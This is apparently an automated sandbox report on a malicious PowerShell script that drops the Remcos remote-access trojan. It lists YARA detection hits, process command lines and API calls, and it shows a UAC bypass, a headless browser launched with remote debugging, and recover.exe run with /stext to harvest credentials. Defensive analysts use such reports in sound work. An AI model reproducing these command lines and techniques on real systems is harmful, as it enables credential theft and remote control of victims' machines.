Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00430F54	10_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004050C2	11_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004014AB	11_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405133	11_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004051A4	11_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401246	11_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_0040CA46	11_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405235	11_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004032C8	11_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401689	11_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402F60	11_2_00402F60

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 1000A588 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401EBF appears 36 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 1000B0E0 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00402117 appears 40 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6520, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Static PE information: Section: iVN#X- ZLIB complexity 1.0013427734375

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winPS1@45/14@3/6

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

9_2_0041A225

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		6_2_00417AD9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		11_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

9_2_0041A6AF

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

6_2_0040C03C

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

6_2_0041B9AB

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

6_2_0041AC43

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JXCJKXCJHKJHXCJHKXCXCJHK.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-U6XQL5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctwee1hh.qvq.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000A.00000002.1561068436.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 00000009.00000003.1600860070.000000000330A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: kent.ps1	Virustotal: Detection: 20%
Source: kent.ps1	ReversingLabs: Detection: 18%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\kent.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gogzsxemgwpfijwqnpyiza"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\iqlksqofuehskykceakkkmhvt"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\tkrctizhimzxveggnlfdvrbmcaxfu"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=1924,i,6628952054718136810,6517183660532382401,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1940 --field-trial-handle=1492,i,17985677580738979378,15190004238409929913,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gogzsxemgwpfijwqnpyiza"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\iqlksqofuehskykceakkkmhvt"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\tkrctizhimzxveggnlfdvrbmcaxfu"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=1924,i,6628952054718136810,6517183660532382401,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1940 --field-trial-handle=1492,i,17985677580738979378,15190004238409929913,262144 --disable-features=PaintHolding /prefetch:3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
